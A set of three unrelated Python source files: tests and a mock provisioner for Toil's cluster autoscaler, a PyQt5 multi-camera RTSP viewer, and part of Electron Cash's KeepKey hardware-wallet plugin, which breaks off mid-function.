self.assertEqual(scaler._round(-15.5), -16)
self.assertEqual(scaler._round(123456789101112.5), 123456789101113)
def testMaxNodes(self):
"""
Set the scaler to be very aggressive, give it a ton of jobs, and
make sure it doesn't go over maxNodes.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
jobShapes.extend([Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=False)] * 1000)
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
def testMinNodes(self):
"""
Without any jobs queued, the scaler should still estimate "minNodes" nodes.
"""
self.config.betaInertia = 0.0
self.config.minNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = []
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
def testPreemptableDeficitResponse(self):
"""
When a preemptable deficit was detected by a previous run of the
loop, the scaler should add non-preemptable nodes to
compensate in proportion to preemptableCompensation.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [10, 10]
# This should mean that one non-preemptable node is launched
# for every two preemptable nodes "missing".
self.config.preemptableCompensation = 0.5
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Simulate a situation where a previous run caused a
# "deficit" of 5 preemptable nodes (e.g. a spot bid was lost)
scaler.preemptableNodeDeficit['c4.8xlarge'] = 5
# Add a bunch of preemptable jobs (so the bin-packing
# estimate for the non-preemptable node should still be 0)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
# We don't care about the estimated size of the preemptable
# nodes. All we want to know is if we responded to the deficit
# properly: 0.5 * 5 (preemptableCompensation * the deficit) = 3 (rounded up).
self.assertEqual(estimatedNodeCounts[self.provisioner.nodeShapes[1]], 3)
def testPreemptableDeficitIsSet(self):
"""
Make sure that updateClusterSize sets the preemptable deficit if
it can't launch preemptable nodes properly. That way, the
deficit can be communicated to the next run of
estimateNodeCount.
"""
# Mock out addNodes. We want to pretend it had trouble
# launching all 5 nodes, and could only launch 3.
self.provisioner.addNodes = MagicMock(return_value=3)
# Pretend there are no nodes in the cluster right now
self.provisioner.getProvisionedWorkers = MagicMock(return_value=[])
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
estimatedNodeCounts = {c4_8xlarge_preemptable: 5, c4_8xlarge: 0}
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 2)
self.provisioner.addNodes.assert_called_once()
# OK, now pretend this is a while later, and actually launched
# the nodes properly. The deficit should disappear
self.provisioner.addNodes = MagicMock(return_value=5)
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 0)
def testNoLaunchingIfDeltaAlreadyMet(self):
"""
Check that the scaler doesn't try to launch "0" more instances if
the delta was able to be met by unignoring nodes.
"""
# We have only one node type for simplicity
self.provisioner.nodeTypes = ['c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Pretend there is one ignored worker in the cluster
self.provisioner.getProvisionedWorkers = MagicMock(
return_value=[Node('127.0.0.1', '127.0.0.1', 'testNode',
datetime.datetime.now().isoformat(),
nodeType='c4.8xlarge', preemptable=True)])
scaler.ignoredNodes.add('127.0.0.1')
# Exercise the updateClusterSize logic
self.provisioner.addNodes = MagicMock()
scaler.updateClusterSize({c4_8xlarge: 1})
self.assertFalse(self.provisioner.addNodes.called,
"addNodes was called when no new nodes were needed")
self.assertEqual(len(scaler.ignoredNodes), 0,
"The scaler didn't unignore an ignored node when "
"scaling up")
def testBetaInertia(self):
# This is really high, but makes things easy to calculate.
self.config.betaInertia = 0.5
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# OK, smoothing things this much should get us 50% of the way to 100.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 50)
# Now we should be at 75%.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 75)
# We should eventually converge on our estimate as long as betaInertia is below 1.
for _ in range(1000):
scaler.smoothEstimate(c4_8xlarge_preemptable, 100)
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 100)
class ScalerThreadTest(ToilTest):
def _testClusterScaling(self, config, numJobs, numPreemptableJobs, jobShape):
"""
Test the ClusterScaler class with different patterns of job creation. Tests ascertain that
autoscaling occurs and that all the jobs are run.
"""
# First do simple test of creating 100 preemptable and non-premptable jobs and check the
# jobs are completed okay, then print the amount of worker time expended and the total
# number of worker nodes used.
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
mock.start()
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
try:
# Add 100 jobs to complete
list(map(lambda x: mock.addJob(jobShape=jobShape),
list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=jobShape, preemptable=True),
list(range(numPreemptableJobs))))
# Add some completed jobs
for preemptable in (True, False):
if preemptable and numPreemptableJobs > 0 or not preemptable and numJobs > 0:
# Add 1000 random jobs
for _ in range(1000):
x = mock.getNodeShape(nodeType=jobShape)
iJ = JobNode(jobStoreID=1,
requirements=dict(
memory=random.choice(list(range(1, x.memory))),
cores=random.choice(list(range(1, x.cores))),
disk=random.choice(list(range(1, x.disk))),
preemptable=preemptable),
command=None,
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(list(range(1, x.wallTime))))
startTime = time.time()
# Wait while the cluster processes the jobs
while (mock.getNumberOfJobsIssued(preemptable=False) > 0
or mock.getNumberOfJobsIssued(preemptable=True) > 0
or mock.getNumberOfNodes() > 0 or mock.getNumberOfNodes(preemptable=True) > 0):
logger.debug("Running, non-preemptable queue size: %s, non-preemptable workers: %s, "
"preemptable queue size: %s, preemptable workers: %s" %
(mock.getNumberOfJobsIssued(preemptable=False),
mock.getNumberOfNodes(preemptable=False),
mock.getNumberOfJobsIssued(preemptable=True),
mock.getNumberOfNodes(preemptable=True)))
clusterScaler.check()
time.sleep(0.5)
logger.debug("We waited %s for cluster to finish" % (time.time() - startTime))
finally:
clusterScaler.shutdown()
mock.shutDown()
# Print some info about the autoscaling
logger.debug("Total-jobs: %s: Max-workers: %s, "
"Total-worker-time: %s, Worker-time-per-job: %s" %
(mock.totalJobs, sum(mock.maxWorkers.values()),
mock.totalWorkerTime,
old_div(mock.totalWorkerTime, mock.totalJobs) if mock.totalJobs > 0 else 0.0))
@slow
def testClusterScaling(self):
"""
Test scaling for a batch of non-preemptable jobs and no preemptable jobs (makes debugging
easier).
"""
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.maxPreemptableNodes = [] # No preemptable nodes
# Non-preemptable parameters
config.nodeTypes = [Shape(20, 10, 10, 10, False)]
config.minNodes = [0]
config.maxNodes = [10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=0,
jobShape=config.nodeTypes[0])
@slow
def testClusterScalingMultipleNodeTypes(self):
smallNode = Shape(20, 5, 10, 10, False)
mediumNode = Shape(20, 10, 10, 10, False)
largeNode = Shape(20, 20, 10, 10, False)
numJobs = 100
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.preemptableNodeTypes = []
config.minPreemptableNodes = []
config.maxPreemptableNodes = [] # No preemptable nodes
# Make sure the node types don't have to be ordered
config.nodeTypes = [largeNode, smallNode, mediumNode]
config.minNodes = [0, 0, 0]
config.maxNodes = [10, 10] # test expansion of this list
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
mock.start()
try:
# Add small jobs
list(map(lambda x: mock.addJob(jobShape=smallNode), list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=mediumNode), list(range(numJobs))))
# Add medium completed jobs
for i in range(1000):
iJ = JobNode(jobStoreID=1,
requirements=dict(
memory=random.choice(range(smallNode.memory, mediumNode.memory)),
cores=mediumNode.cores,
disk=largeNode.cores,
preemptable=False),
command=None,
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(range(1, 10)))
while mock.getNumberOfJobsIssued() > 0 or mock.getNumberOfNodes() > 0:
logger.debug("%i nodes currently provisioned" % mock.getNumberOfNodes())
# Make sure there are no large nodes
self.assertEqual(mock.getNumberOfNodes(nodeType=largeNode), 0)
clusterScaler.check()
time.sleep(0.5)
finally:
clusterScaler.shutdown()
mock.shutDown()
# Make sure jobs ran on both the small and medium node types
self.assertTrue(mock.totalJobs > 0)
self.assertTrue(mock.maxWorkers[smallNode] > 0)
self.assertTrue(mock.maxWorkers[mediumNode] > 0)
self.assertEqual(mock.maxWorkers[largeNode], 0)
@slow
def testClusterScalingWithPreemptableJobs(self):
"""
Test scaling simultaneously for a batch of preemptable and non-preemptable jobs.
"""
config = Config()
jobShape = Shape(20, 10, 10, 10, False)
preemptableJobShape = Shape(20, 10, 10, 10, True)
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# non-preemptable node parameters
config.nodeTypes = [jobShape, preemptableJobShape]
config.minNodes = [0, 0]
config.maxNodes = [10, 10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.9
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=100, jobShape=jobShape)
# noinspection PyAbstractClass
class MockBatchSystemAndProvisioner(AbstractScalableBatchSystem, AbstractProvisioner):
"""
Mimics a job batcher, provisioner and scalable batch system
"""
def __init__(self, config, secondsPerJob):
super(MockBatchSystemAndProvisioner, self).__init__('clusterName')
# To mimic parallel preemptable and non-preemptable queues
# for jobs we create two parallel instances of the following class
self.config = config
self.secondsPerJob = secondsPerJob
self.provisioner = self
self.batchSystem = self
self.nodeTypes = config.nodeTypes
self.nodeShapes = self.nodeTypes
self.nodeShapes.sort()
self.jobQueue = Queue()
self.updatedJobsQueue = Queue()
self.jobBatchSystemIDToIssuedJob = {}
self.totalJobs = 0 # Count of total jobs processed
self.totalWorkerTime = 0.0 # Total time spent in worker threads
self.toilMetrics = None
self.nodesToWorker = {} # Map from Node to instances of the Worker class
self.workers = {nodeShape: [] for nodeShape in
self.nodeShapes} # Instances of the Worker class
self.maxWorkers = {nodeShape: 0 for nodeShape in
self.nodeShapes} # Maximum number of workers
self.running = False
self.leaderThread = Thread(target=self._leaderFn)
def start(self):
self.running = True
self.leaderThread.start()
def shutDown(self):
self.running = False
self.leaderThread.join()
# Stub out all AbstractBatchSystem methods since they are never called
for name, value in iteritems(AbstractBatchSystem.__dict__):
if getattr(value, '__isabstractmethod__', False):
exec('def %s(): pass' % name)
# Without this, the class would end up with .name and .value attributes
del name, value
# AbstractScalableBatchSystem methods
def nodeInUse(self, nodeIP):
return False
def ignoreNode(self, nodeAddress):
pass
def unignoreNode(self, nodeAddress):
pass
@contextmanager
def nodeFiltering(self, filter):
nodes = self.getProvisionedWorkers(preemptable=True,
nodeType=None) + self.getProvisionedWorkers(
preemptable=False, nodeType=None)
yield nodes
# AbstractProvisioner methods
def getProvisionedWorkers(self, nodeType=None, preemptable=None):
"""
Returns a list of Node objects, each representing a worker node in the cluster
:param preemptable: If True only return preemptable nodes else return non-preemptable nodes
:return: list of Node
"""
nodesToWorker = self.nodesToWorker
if nodeType:
return [node for node in nodesToWorker if node.nodeType == nodeType]
else:
return list(nodesToWorker.keys())
def terminateNodes(self, nodes):
self._removeNodes(nodes)
def remainingBillingInterval(self, node):
pass
def addJob(self, jobShape, preemptable=False):
"""
Add a job to the job queue
"""
self.totalJobs += 1
jobID = uuid.uuid4()
self.jobBatchSystemIDToIssuedJob[jobID] = Job(memory=jobShape.memory,
cores=jobShape.cores, disk=jobShape.disk,
preemptable=preemptable)
self.jobQueue.put(jobID)
# JobBatcher functionality
def getNumberOfJobsIssued(self, preemptable=None):
if preemptable is not None:
jobList = [job for job in list(self.jobQueue.queue) if
self.jobBatchSystemIDToIssuedJob[job].preemptable == preemptable]
return len(jobList)
else:
return self.jobQueue.qsize()
def getJobs(self):
return self.jobBatchSystemIDToIssuedJob.values()
# AbstractScalableBatchSystem functionality
def getNodes(self, preemptable=False, timeout=None):
nodes = dict()
for node in self.nodesToWorker:
if node.preemptable == preemptable:
worker = self.nodesToWorker[node]
nodes[node.privateIP] = NodeInfo(coresTotal=0, coresUsed=0, requestedCores=1,
memoryTotal=0, memoryUsed=0, requestedMemory=1,
workers=1 if worker.busyEvent.is_set() else 0)
return nodes
# AbstractProvisioner functionality
def addNodes(self, nodeType, numNodes, preemptable):
self._addNodes(numNodes=numNodes, nodeType=nodeType, preemptable=preemptable)
return self.getNumberOfNodes(nodeType=nodeType, preemptable=preemptable)
def getNodeShape(self, nodeType, preemptable=False):
# Assume node shapes and node types are the same thing for testing
return nodeType
def getWorkersInCluster(self, nodeShape):
return self.workers[nodeShape]
def launchCluster(self, leaderNodeType, keyName, userTags=None,
vpcSubnet=None, leaderStorage=50, nodeStorage=50, botoPath=None, **kwargs):
pass
def destroyCluster(self):
pass
def getLeader(self):
pass
def _leaderFn(self):
while self.running:
updatedJobID = None
try:
updatedJobID = self.updatedJobsQueue.get(timeout=1.0)
except Empty:
continue
if updatedJobID:
del self.jobBatchSystemIDToIssuedJob[updatedJobID]
time.sleep(0.1)
def _addNodes(self, numNodes, nodeType, preemptable=False):
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
class Worker(object):
def __init__(self, jobQueue, updatedJobsQueue, secondsPerJob):
self.busyEvent = Event()
self.stopEvent = Event()
def workerFn():
while True:
if self.stopEvent.is_set():
return
try:
jobID = jobQueue.get(timeout=1.0)
except Empty:
continue
updatedJobsQueue.put(jobID)
self.busyEvent.set()
time.sleep(secondsPerJob)
self.busyEvent.clear()
self.startTime = time.time()
self.worker = Thread(target=workerFn)
self.worker.start()
def stop(self):
self.stopEvent.set()
self.worker.join()
return time.time() - self.startTime
for _ in range(numNodes):
node = Node('127.0.0.1', uuid.uuid4(), 'testNode', datetime.datetime.now().isoformat()+'Z', nodeType=nodeType,
preemptable=preemptable)
self.nodesToWorker[node] = Worker(self.jobQueue, self.updatedJobsQueue, self.secondsPerJob)
self.workers[nodeShape].append(self.nodesToWorker[node])
self.maxWorkers[nodeShape] = max(self.maxWorkers[nodeShape], len(self.workers[nodeShape]))
def _removeNodes(self, nodes):
logger.debug("Removing nodes. %s workers and %s to terminate.", len(self.nodesToWorker),
len(nodes))
for node in nodes:
logger.debug("removed node")
try:
nodeShape = self.getNodeShape(node.nodeType, node.preemptable)
worker = self.nodesToWorker.pop(node)
self.workers[nodeShape].pop()
self.totalWorkerTime += worker.stop()
except KeyError:
# Node isn't our responsibility
pass
def getNumberOfNodes(self, nodeType=None, preemptable=None):
if nodeType:
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
return len(self.workers[nodeShape])
else:
return len(self.nodesToWorker)
|
gui_camera_feed.py
|
from constants import *
from PyQt5 import QtCore, QtGui, QtWidgets
import qdarkstyle
from threading import Thread
from collections import deque
from datetime import datetime
import time
import sys
import cv2
import imutils
from aieAPI.aieAPI import AIE, call_aie
class CameraWidget(QtWidgets.QWidget):
"""Independent camera feed
Uses threading to grab IP camera frames in the background
@param width - Width of the video frame
@param height - Height of the video frame
@param stream_link - IP/RTSP/Webcam link
@param aspect_ratio - Whether to maintain frame aspect ratio or force into frame
"""
def __init__(self, aie, width, height, stream_link=0, aspect_ratio=False, parent=None, deque_size=1):
super(CameraWidget, self).__init__(parent)
self.aie = AIE() if aie is None else aie
# Initialize deque used to store frames read from the stream
self.deque = deque(maxlen=deque_size)
# Slight offset is needed since PyQt layouts have a built in padding
# So add offset to counter the padding
self.offset = 16
self.screen_width = width - self.offset
self.screen_height = height - self.offset
self.maintain_aspect_ratio = aspect_ratio
self.camera_stream_link = stream_link
# Flag to check if camera is valid/working
self.online = False
self.capture = None
self.video_frame = QtWidgets.QLabel()
self.load_network_stream()
# Start background frame grabbing
self.get_frame_thread = Thread(target=self.get_frame, args=())
self.get_frame_thread.daemon = True
self.get_frame_thread.start()
# Periodically set video frame to display
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.set_frame)
self.timer.start(1)
print('Started camera: {}'.format(self.camera_stream_link))
def load_network_stream(self):
"""Verifies stream link and open new stream if valid"""
def load_network_stream_thread():
if self.verify_network_stream(self.camera_stream_link):
self.capture = cv2.VideoCapture(self.camera_stream_link)
self.online = True
self.load_stream_thread = Thread(target=load_network_stream_thread, args=())
self.load_stream_thread.daemon = True
self.load_stream_thread.start()
def verify_network_stream(self, link):
"""Attempts to receive a frame from given link"""
cap = cv2.VideoCapture(link)
if not cap.isOpened():
return False
cap.release()
return True
def get_frame(self):
"""Reads frame, resizes, and converts image to pixmap"""
# aie = AIE()
fps = 0.
while True:
try:
if self.capture.isOpened() and self.online:
# Read next frame from stream and insert into deque
tic = time.perf_counter()
status, frame = self.capture.read()
if status:
frame = call_aie(frame, fps, self.aie)
fps = 1. / (time.perf_counter() - tic)
self.deque.append(frame)
else:
self.capture.release()
self.online = False
else:
# Attempt to reconnect
print('attempting to reconnect', self.camera_stream_link)
self.load_network_stream()
self.spin(2)
self.spin(.001)
except AttributeError:
pass
def spin(self, seconds):
"""Pause for set amount of seconds, replaces time.sleep so program doesnt stall"""
time_end = time.time() + seconds
while time.time() < time_end:
QtWidgets.QApplication.processEvents()
def set_frame(self):
"""Sets pixmap image to video frame"""
if not self.online:
self.spin(1)
return
if self.deque and self.online:
# Grab latest frame
frame = self.deque[-1]
# Keep frame aspect ratio
if self.maintain_aspect_ratio:
self.frame = imutils.resize(frame, width=self.screen_width)
# Force resize
else:
self.frame = cv2.resize(frame, (self.screen_width, self.screen_height))
# Add timestamp to cameras
cv2.rectangle(self.frame, (self.screen_width - 190, 0), (self.screen_width, 50), color=(0, 0, 0),
thickness=-1)
cv2.putText(self.frame, datetime.now().strftime('%H:%M:%S'), (self.screen_width - 185, 37),
cv2.FONT_HERSHEY_SIMPLEX, 1.2, (255, 255, 255), lineType=cv2.LINE_AA)
# Convert to pixmap and set to video frame
self.img = QtGui.QImage(self.frame, self.frame.shape[1], self.frame.shape[0],
QtGui.QImage.Format_RGB888)
self.pix = QtGui.QPixmap.fromImage(self.img)
self.video_frame.setPixmap(self.pix)
def get_video_frame(self):
return self.video_frame
def exit_application():
"""Exit program event handler"""
sys.exit(1)
if __name__ == '__main__':
# aie_global = AIE()
aie_global = None
# Create main application window
app = QtWidgets.QApplication([])
app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
app.setStyle(QtWidgets.QStyleFactory.create("Cleanlooks"))
mw = QtWidgets.QMainWindow()
mw.setWindowTitle('Camera GUI')
mw.setWindowFlags(QtCore.Qt.FramelessWindowHint)
cw = QtWidgets.QWidget()
ml = QtWidgets.QGridLayout()
cw.setLayout(ml)
mw.setCentralWidget(cw)
mw.showMaximized()
# Dynamically determine screen width/height
screen_width = QtWidgets.QApplication.desktop().screenGeometry().width()
screen_height = QtWidgets.QApplication.desktop().screenGeometry().height()
# Create Camera Widgets
username = 'Your camera username!'
password = 'Your camera password!'
# Stream links
camera0 = 'rtsp://admin:[email protected]:554/h264Preview_01_sub'.format(CAMERA_USER, CAMERA_PSWD)
camera1 = 'rtsp://admin:[email protected]:554/h264Preview_01_sub'.format(CAMERA_USER, CAMERA_PSWD)
camera2 = 'rtsp://admin:[email protected]:554/h264Preview_01_sub'.format(CAMERA_USER, CAMERA_PSWD)
# Create camera widgets
print('Creating Camera Widgets...')
zero = CameraWidget(aie_global, screen_width // 3, screen_height // 3, camera0)
one = CameraWidget(aie_global, screen_width // 3, screen_height // 3, camera1)
two = CameraWidget(aie_global, screen_width // 3, screen_height // 3, camera2)
# Add widgets to layout
print('Adding widgets to layout...')
ml.addWidget(zero.get_video_frame(), 0, 0, 1, 1)
ml.addWidget(one.get_video_frame(), 0, 1, 1, 1)
ml.addWidget(two.get_video_frame(), 0, 2, 1, 1)
# ml.addWidget(three.get_video_frame(),1,0,1,1)
# ml.addWidget(four.get_video_frame(),1,1,1,1)
# ml.addWidget(five.get_video_frame(),1,2,1,1)
# ml.addWidget(six.get_video_frame(),2,0,1,1)
# ml.addWidget(seven.get_video_frame(),2,1,1,1)
print('Verifying camera credentials...')
mw.show()
QtWidgets.QShortcut(QtGui.QKeySequence('Ctrl+Q'), mw, exit_application)
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtWidgets.QApplication.instance().exec_()
|
plugin.py
|
import threading
from binascii import hexlify, unhexlify
from electroncash.util import bfh, bh2u, UserCancelled
from electroncash.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT)
from electroncash.i18n import _
from electroncash.networks import NetworkConstants
from electroncash.plugins import BasePlugin
from electroncash.transaction import deserialize
from electroncash.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKeyCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if keepkey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if NetworkConstants.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except Exception as e:
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the intialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_type = self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey('standard', bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
